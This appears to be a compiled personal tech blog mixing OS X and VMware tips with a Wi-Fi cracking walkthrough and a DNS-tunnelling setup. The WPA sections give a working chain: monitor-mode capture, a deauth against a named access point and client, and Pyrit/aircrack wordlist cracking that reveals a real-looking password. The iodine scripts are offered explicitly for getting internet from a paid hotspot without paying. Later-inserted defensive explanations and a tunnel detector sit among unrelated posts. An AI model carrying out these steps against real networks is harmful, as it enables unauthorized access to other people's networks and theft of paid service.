CUDA Driver:

```
rm -r /usr/local/cuda
rm -r /Library/Frameworks/CUDA.framework
```

CUDA Toolkit:

```
rm -r /Developer/NVIDIA
```
Cracking a WPA password with aircrack-ng is not fast, especially in a VM, so the first step is to do the cracking outside of BackTrack. Get the .cap file out of the VM by dragging it from the VM to the desktop.
Using just the CPU is also slow; GPUs these days crack faster than the CPU.
OS X Mountain Lion comes with OpenCL tools. Xcode is big, and most of it is iOS and OS X development tooling we don't need, so installing only the Command Line Tools is enough. An Apple developer account (free) is required to download them:
Then click Next or Continue until it is done.
The full Xcode can be installed from the App Store:
Then the Command Line Tools have to be installed. Go to Xcode, then Properties:
Pyrit is a Python tool that cracks WPA passwords.
Prerequisites. Download these into a folder, named PYRIT for example:
http://libdnet.googlecode.com/files/libdnet-1.12.tgz
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz
Then, in that folder, in a terminal run:

```
tar -xzf libdnet-1.12.tgz
cd libdnet-1.12
./configure
make
sudo make install
cd python
sudo python setup.py install
cd ../..
tar -xzf pylibpcap-0.6.4.tar.gz
cd pylibpcap-0.6.4
sudo python setup.py install
cd ..
tar -xzf scapy-latest.tar.gz
cd scapy-2.1.0
sudo python setup.py install
cd ..
```
Now it's time for the pyrit tool itself:

```
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
cd pyrit-read-only
cd pyrit
sudo python setup.py install
```
Extra steps for NVIDIA:
Download the NVIDIA CUDA driver from http://developer.nvidia.com/cuda/cuda-downloads.
If you don't have the NVIDIA driver installed, you'll get:

```
SystemError: Nvidia's CUDA-compiler 'nvcc' can't be found.
```
Check the first and second option:
Then:
```
cd ..
cd ..
cd pyrit-read-only
cd cpyrit_cuda
sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install
```
On a MacBook with an ATI card we get something like:

```
$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1:  'OpenCL-Device 'ATI Radeon HD 6750M''
#2:  'CPU-Core (SSE2/AES)'
#3:  'CPU-Core (SSE2/AES)'
#4:  'CPU-Core (SSE2/AES)'
#5:  'CPU-Core (SSE2/AES)'
#6:  'CPU-Core (SSE2/AES)'
#7:  'CPU-Core (SSE2/AES)'
#8:  'CPU-Core (SSE2/AES)'
```
On a MacBook with an NVIDIA card we get something like:

```
$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1:  'CUDA-Device #1 'GeForce 9400M''
#2:  'CPU-Core (SSE2)'
```
Note: I have no idea why, when OpenCL or CUDA is installed, it takes the place of one of the cores; on a quad-core we get 7 cores with OpenCL. When benchmarking it seems all cores are being utilized. I guess it's a bug.
```
$ pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (7724.0 PMKs/s)... -

Computed 7723.98 PMKs/s total.
#1: 'OpenCL-Device 'ATI Radeon HD 6750M'': 7180.7 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2/AES)': 252.6 PMKs/s (RTT 3.8)
#3: 'CPU-Core (SSE2/AES)': 247.2 PMKs/s (RTT 3.9)
#4: 'CPU-Core (SSE2/AES)': 243.6 PMKs/s (RTT 4.0)
#5: 'CPU-Core (SSE2/AES)': 246.6 PMKs/s (RTT 3.9)
#6: 'CPU-Core (SSE2/AES)': 250.8 PMKs/s (RTT 3.8)
#7: 'CPU-Core (SSE2/AES)': 253.0 PMKs/s (RTT 3.8)
#8: 'CPU-Core (SSE2/AES)': 250.4 PMKs/s (RTT 3.9)
```
You can see that the GPU alone is faster than the 7 CPU cores combined (there should be 8; I don't know why one is missing).
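The PMKs/s figures above are bounded by the key derivation itself: every candidate passphrase costs one PBKDF2-HMAC-SHA1 run of 4096 rounds with the SSID as salt, which is the same work a supplicant does when it joins a network. As an added example (not code from the original post or from Pyrit), the following Python derives a PMK that way, checks it against the IEEE 802.11i Annex H test vector, and turns this page's measured rates into worst-case time to exhaust a wordlist; the wordlist size is an assumed value, not a figure from the page.

```python
import hashlib

# Constants fixed by IEEE 802.11i; the 4096 rounds are what bound the PMKs/s figure
WPA_PBKDF2_ROUNDS = 4096
PMK_LEN = 32


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key exactly as a WPA/WPA2-PSK supplicant does.

    PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes). The SSID is
    the salt, so a precomputed table only helps against that exact network name.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               WPA_PBKDF2_ROUNDS, PMK_LEN)


def seconds_to_exhaust(wordlist_size: int, pmks_per_second: float) -> float:
    """Worst-case time to test every wordlist entry at a measured PMK rate."""
    if wordlist_size < 0 or pmks_per_second <= 0:
        raise ValueError("size must be >= 0 and rate must be positive")
    return wordlist_size / pmks_per_second


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    pmk = wpa_pmk("password", "IEEE")
    print(pmk.hex())  # f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
    # Same passphrase, different SSID gives an unrelated PMK (the salt matters)
    print(wpa_pmk("password", "IEEE-2") != pmk)  # True
    # Rates from this page's benchmark: GPU 7180.7 PMKs/s, one CPU core 252.6 PMKs/s.
    # The wordlist size is an assumed value (constructed), not a figure from the page.
    ASSUMED_WORDLIST_SIZE = 14_000_000
    for label, rate in (("GPU", 7180.7), ("one CPU core", 252.6)):
        hours = seconds_to_exhaust(ASSUMED_WORDLIST_SIZE, rate) / 3600
        print(f"{label}: {hours:.1f} h to exhaust the list")
```

The rate is per candidate, so a passphrase that is not in any list (long and random) is not reachable at any of these speeds; that is the whole point of the 4096-round stretch.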
Wordlists can be found here: http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html
Make sure you're in Discrete Only mode, otherwise pyrit will complain:

```
Exception in thread OpenCL-Device 'ATI Radeon HD 6750M':
[...]
SystemError: Failed to create command-queue (CL_INVALID_VALUE)
[...]
SystemError: The core 'OpenCL-Device 'ATI Radeon HD 6750M'' has died unexpectedly
```
```
$ pyrit -r ~/Steve-01.cap --all-handshakes -i ~/WORDLISTS/4.9gb/BIG-WPA-LIST-1.txt attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file '/Users/c00l/Desktop/Steve-01.cap' (1/1)...
Parsed 3539 packets (3539 802.11-packets), got 115 AP(s)

Picked AccessPoint 00:0f:01:37:1a:a0 ('Steve') automatically.
Attacking 20 handshake(s).
Tried 140007 PMKs so far; 7550 PMKs per second.

The password is 'forzajuve'.
```
--all-handshakes means that all handshakes in the file are used together.
Pyrit utilizes the CPU and the GPU simultaneously, and now we get around 10k attempts/sec, which is a lot better than aircrack-ng in a VM.
Note: your computer will become unresponsive, so make sure anything CPU- or GPU-intensive is switched off.
Let's check the wi-fis:
```
# airodump-ng mon0
```
Now we choose which AP to attack. Let's choose Steve. The --bssid parameter says which AP to listen for, -c says which channel to stay on, and -w names the file the captured authentication is dumped to.
```
# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve.cap
```
This is called a deauth attack: we de-authenticate one client and wait for it to reconnect, capturing the handshake when it does. -a is the AP, -c is the client we deauth, -0 selects the deauthentication attack, and 1 means to perform it only once.
```
# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5
```
And we get the handshake.
Now we crack it. We will use a wordlist.
```
# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt
```

If the password is in the wordlist, then:
Unfortunately this method can try only ~800 passwords per second from the wordlist. In later articles we'll see better approaches.
First, trying to crack wi-fi APs natively on OS X will not work well. KisMAC is not great: it cannot inject packets with the MacBook's built-in wi-fi card, and aircrack-ng does not work.
So to inject stuff, an external USB wi-fi is required. I have tried ALFA AWUS036NEH (chipset Ralink RT3070) and TP-Link TL-WN722N (chipset Atheros AR9271).
ALFAs are recommended by half the internet, but I think they suck. My Alfa is not stable; it doesn't work with BT5R3, only BT5R2. The Atheros is a lot better, but has no 5GHz. I'm waiting for the NETGEAR WNDA3200, which has a 5GHz radio that works simultaneously with the 2.4GHz radio.
The best VM to use is BackTrack - all the cracking tools are inside. Latest version is BT5R3. It even comes as a prebuilt VMware virtual machine. I'm using VMware Fusion on OS X.
(user: root, pass: toor; startx to launch gnome):
Adding the card to the USB:
Then in terminal we check for a wi-fi card. We find one on wlan1 and start a monitoring interface for it.
```
# airmon-ng
# airmon-ng start wlan1
# airmon-ng
```
Then, let's check the wi-fis:
```
# airodump-ng mon0
```
In later articles we'll see how to hack the wi-fi.
For comparison, John the Ripper's wpapsk-opencl format benchmarked on the same ATI GPU and on the CPU:

```
root# ./john --test -format=wpapsk-opencl
OpenCL platform 0: Apple, 2 device(s).
Using device 1: ATI Radeon HD 6750M
Benchmarking: WPA-PSK PBKDF2-HMAC-SHA-1 [OpenCL]... DONE
Raw:    12126 c/s real, 87771 c/s virtual

root# ./john --test -format=wpapsk-opencl --device=0
OpenCL platform 0: Apple, 2 device(s).
Using device 0: Intel(R) Core(TM) i7-2820QM CPU @ 2.30GHz
Benchmarking: WPA-PSK PBKDF2-HMAC-SHA-1 [OpenCL]... DONE
Raw:    1192 c/s real, 156 c/s virtual
```
Sometimes there are a lot of VMware Fusion items left over in the "Open with" dialog.
Here's how to rebuild the "Open with" database:
```
dude$ /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -kill -r -domain local -domain system -domain user
dude$ killall Finder
```
Plug in the USB stick, then:
```
mf$ hdiutil convert -format UDRW -o BT5R2-GNOME-64.img BT5R2-GNOME-64.iso
mf$ diskutil list
/dev/disk2   #(careful here)
mf$ dd if=./BT5R2-GNOME-64.img.dmg of=/dev/rdisk2 bs=1m
```
Note: use bs=1m (without it the speed is going to be less than 1mb/sec; with it, it's 10mb/sec).
Note 2: we're using rdisk2 instead of disk2; again, this way it's faster.
It's pretty good. I just found it, so no feedback of any kind, but it looks good. The app is available in the App Store.
How to get internet connectivity on an open wi-fi access point that requires a credit card without actually paying:
```sh
#!/bin/sh /etc/rc.common
# Copyright (C) 2006-2011 OpenWrt.org

START=50

start_instance () {
    local section="$1"
    config_get address "$section" 'address'
    config_get password "$section" 'password'
    config_get tunnelip "$section" 'tunnelip'
    config_get tld "$section" 'tld'
    service_start /usr/sbin/iodined -l "$address" -c -s -P "$password" $tunnelip "$tld" &
    sleep 1
    ifconfig dns0 $tunnelip netmask 255.255.255.0
}

start() {
    config_load 'iodined'
    config_foreach start_instance 'iodined'
}

stop() {
    service_stop /usr/sbin/iodined
}
```
Then enable the service:

```
/etc/init.d/iodined enable
```
The config section it reads:

```
config iodined
	option address ''
	option password ''
	option tunnelip '192.168.14.1'
	option tld ''
```
```bash
#!/bin/bash
# are we root?
if ! [ $UID == 0 ] ; then echo "IODINE SETUP: use 'sudo $0'"; exit 0; fi;
#$1 says whether we use clearcode or stoynov.com
if [ -z $1 ] ; then echo 'IODINE SETUP: first param must be 1(i.clearcode.org) or 2(i.stoynov.com)'; exit 0; fi;
if [ $1 == 1 ] ; then
    endpoint_domain='i.clearcode.org'
    endpoint_net='192.168.14.0/24'
    endpoint_gw='192.168.14.1'
fi;
if [ $1 == 2 ] ; then
    endpoint_domain='j.stoynov.com'
    endpoint_net='192.168.15.0/24'
    endpoint_gw='192.168.15.1'
fi;
# get the first dns from resolv.conf and use it.
abused_nameserver=`cat /etc/resolv.conf | grep nameserver | head -1 | awk '{print $2}'`
abused_nameserver=8.8.4.4
echo ">>>>>>>>>>>>>>>>>>>USING DNS: $abused_nameserver"
# kill iodine if any and remove old routes
killall iodine
route delete 8.8.8.8 > /dev/null
route delete 8.8.4.4 > /dev/null
# get the default gateway for iodine
default_gateway=`netstat -rn | grep default | awk '{print $2}'`
#when I die, restore the default gateway, use trap to get Ctrl+C
function disconnect() {
    # kill the process with id coming as a parameter
    kill -9 $1;
    route add default $default_gateway;
}
#disconnect and exit
function cleanup() {
    disconnect $(pgrep iodine);
    exit 0;
}
trap "cleanup" SIGINT
#dns query types
dns_query_types="TXT CNAME NULL"
function connect() {
    # start iodine (possible dns types are CNAME, TXT, NULL), -F puts a pid file with the processId inside
    iodine_output=$(./iodine -T CNAME -r -P "peshev sucks" -F /var/run/iodine.pid $abused_nameserver $endpoint_domain 2>&1 | tee /dev/tty)
    #remote_net from iodine_output
    remote_net=$(echo $iodine_output | grep -o "Adding route [0-9\.]*/[0-9]\{1,2\} to [0-9\.]*" | awk '{print $3}')
    #remote_net is something like 192.168.15.2/27 and should be 192.168.15.0/27
    remote_net=$(./ipcalc -nb $remote_net | grep Network | awk '{ print $2}')
    #tunX_ip (tunX_ip) from iodine_output
    tunX_ip=$(echo $iodine_output | grep -o "Adding route [0-9\.]*/[0-9]\{1,2\} to [0-9\.]*" | awk '{print $5}')
    #remote_gateway (gateway on iodine) from iodine_output
    remote_gateway=$(echo $iodine_output | grep -o "Server tunnel IP is [0-9\.]*" | awk '{print $5}')
    # route to nameserver to be abused
    route add -host $abused_nameserver $default_gateway
    # route to remote network via tunX_ip (necessary because my mac sucks)
    route add -net $remote_net $tunX_ip
    # change default gateway from system default to iodine
    route delete default
    route add default $remote_gateway
    # time to download 100kb file in seconds (1.34). We remove the dot for easy comparison (1.34 -> 134)
    echo TESTING SPEED;
    t=$( { time -p curl -s ftp://speedtest:speedtest@ftp.otenet.gr/test100k.db; } 2>&1 )
    seconds=$(echo $t | awk '{ print $2;}' | tr -d . );
    echo SECONDS: $seconds;
}
connect;
echo 'READY...READY...READY...READY...READY...'
while true; do sleep 10000; done;
```
Testing showed speeds of about 7-15 kb/s, sometimes less, via 8.8.8.8 and 8.8.4.4. With local DNS servers the speeds are around 100kb/s. More testing is necessary.
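The tunnel above leaves exactly the footprint a resolver log exposes: one client sending many NULL, TXT or CNAME queries whose long, high-entropy first labels carry the payload, all under a single domain that the resolver has to forward to the tunnel's authoritative server. As an added example, not from the original post or from iodine, here is a small Python detector that scores constructed resolver log lines on those signals; the log format, the placeholder domain tun.example.net, the two-label "registered domain" shortcut and the thresholds are all assumptions.

```python
import math
from collections import Counter, defaultdict

IODINE_QTYPES = {"NULL", "TXT", "CNAME"}  # types the client script above cycles through

# Constructed resolver log lines, not real traffic: "<client> <qtype> <qname>".
# tun.example.net is a placeholder tunnel domain; the long first label carries payload.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 AAAA www.example.com
10.0.0.7 NULL yz4kq8pqc2mv3w9abx7e0rk5tj1.tun.example.net
10.0.0.7 NULL pkvz09ndm3l1q7wbb5xc2zr8hfu4.tun.example.net
10.0.0.5 A mail.example.com
10.0.0.7 CNAME a3h8dkq2p0lzx9mwv6yn4trc5bs1.tun.example.net
10.0.0.5 MX example.com
10.0.0.7 TXT z8bn4wq1kd0sp7lmxv2c9rty5aeu.tun.example.net
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payload labels score far higher than hostnames."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def base_domain(qname: str) -> str:
    """Crude registered domain = last two labels (assumption; use a suffix list in practice)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def find_tunnel_candidates(log_text, min_queries=4, min_label_len=20, min_entropy=3.5):
    """Score each (client, domain) pair on volume, iodine-style qtypes and label shape."""
    stats = defaultdict(lambda: {"n": 0, "tunnel_types": 0, "label_len": 0, "entropy": 0.0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # tolerate truncated or malformed lines instead of aborting
        client, qtype, qname = parts
        first_label = qname.split(".")[0].lower()
        s = stats[(client, base_domain(qname))]
        s["n"] += 1
        s["tunnel_types"] += qtype.upper() in IODINE_QTYPES
        s["label_len"] += len(first_label)
        s["entropy"] += shannon_entropy(first_label)
    flagged = {}
    for key, s in stats.items():
        if s["n"] < min_queries:
            continue
        mean_len, mean_ent = s["label_len"] / s["n"], s["entropy"] / s["n"]
        type_frac = s["tunnel_types"] / s["n"]
        if type_frac >= 0.5 or (mean_len >= min_label_len and mean_ent >= min_entropy):
            flagged[key] = {"queries": s["n"], "mean_label_len": round(mean_len, 1),
                            "mean_entropy": round(mean_ent, 2), "qtype_fraction": round(type_frac, 2)}
    return flagged
```

Running find_tunnel_candidates(SAMPLE_LOG) flags only the 10.0.0.7 / example.net pair; the ordinary A, AAAA and MX lookups from 10.0.0.5 stay below every threshold. On the network side, the mitigation the page implies is the same one that defeats this tunnel: a captive portal that does not forward arbitrary recursive DNS before authentication.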
With OS X 10.8, gfxCardStatus is no longer capable of enforcing the integrated graphics card only.
When one uses VMware Fusion, the discrete graphics card is forced on, which drains the battery too fast.
I have not found any solution online to fix this. But I managed (thanks to PePe) to discover one.
How to use Integrated Graphics Card with VMware Fusion on OS X 10.8:
Remove the "Split to 2gb files" option.
Defrag and gather the files together physically on the disk with some good defragger (XP's internal one sucks big time).